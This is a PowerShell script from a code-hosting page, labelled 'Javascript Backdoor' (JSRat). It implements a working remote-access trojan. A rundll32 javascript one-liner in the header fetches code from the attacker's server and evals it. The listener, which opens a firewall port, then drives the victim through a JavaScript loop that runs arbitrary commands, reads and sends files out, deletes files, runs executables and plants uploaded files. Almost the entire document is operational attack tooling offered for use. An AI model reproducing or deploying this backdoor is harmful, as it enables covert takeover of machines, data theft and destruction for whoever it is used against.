Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
304 lines (250 sloc) 12.1 KB
<#
---
Learn from Casey Smith @subTee
Author: 3gstudent
Version:1.2
Add code to work behind a proxy server.
---
Javascript Backdoor
---
Server:
run as admin:
powershell.exe -ExecutionPolicy Bypass -File c:\test\JSRat.ps1
Client:
cmd line:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
#>
$Server = '192.168.174.131' #Listening IP. Change This.
function Receive-Request
{
param
(
$Request
)
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do
{
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host $output
}
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://+:80/')
netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null
$listener.Start()
'Listening ...'
while ($true)
{
$context = $listener.GetContext() # blocks until request is received
$request = $context.Request
$response = $context.Response
$hostip = $request.RemoteEndPoint
#Use this for One-Liner Start
if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET"))
{
write-host "Usage:" -fore Green
write-host " cmd: just input the cmd command" -fore Green
write-host " delete file: input:delete,then set the file path" -fore Green
write-host " exitbackdoor: input:exit" -fore Green
write-host " read file: input:read,then set the file path" -fore Green
write-host " run exe: input:run,then set the file path" -fore Green
write-host " download file: input:download,then set the file path" -fore Green
write-host " upload file: input:upload,then set the file path" -fore Green
write-host "Host Connected" -fore Cyan
$message = '
while(true)
{
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.SetTimeouts(0, 0, 0, 0);
try
{
h.Open("GET","http://'+$Server+'/rat",false);
h.Send();
c = h.ResponseText;
if(c=="delete")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Delete]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f =fso1.GetFile(d);
f.Delete();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Delete Success]");
continue;
}
else if(c=="download")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to download]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/download",false);
p.Send(g);
continue;
}
else if(c=="exit")
{
c="(\"cmd /c taskkill /f /im rundll32.exe\",0,true)";
r = new ActiveXObject("WScript.Shell").Run(c);
}
else if(c=="read")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Read]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(g);
continue;
}
else if(c=="run")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Run]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
r = new ActiveXObject("WScript.Shell").Run(d,0,true);
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Run Success]");
continue;
}
else if(c=="upload")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Start to Upload]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/uploadpath",false);
g.Send();
dpath = g.ResponseText;
g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g2.SetTimeouts(0, 0, 0, 0);
g2.Open("GET","http://'+$Server+'/uploaddata",false);
g2.Send();
ddata = g2.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.CreateTextFile(dpath,true);
f.WriteLine(ddata);
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Upload Success]");
continue;
}
else
{
r = new ActiveXObject("WScript.Shell").Exec(c);
var so;
while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()}
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(so);
}
}
catch(e1)
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[No Output]");
}
}
'
}
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") )
{
Receive-Request($request)
}
if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") )
{
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do {
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host "Input the Path to Save:" -fore Red
$message = Read-Host
Set-Content $message -Value $output
write-host "Save Success" -fore Red
}
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET"))
{
$response.ContentType = 'text/plain'
$message = Read-Host "JS $hostip>"
}
if($BoolExit -eq 1)
{
exit
}
$BoolExit=0
if($message -eq "exit")
{
$BoolExit=1
}
if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") )
{
write-host "Input the Path to upload:" -fore Red
$UploadPath = Read-Host
write-host "Input the Destination Path:" -fore Red
$message = Read-Host
}
if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") )
{
$message = Get-Content $UploadPath
}
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
}
$listener.Stop()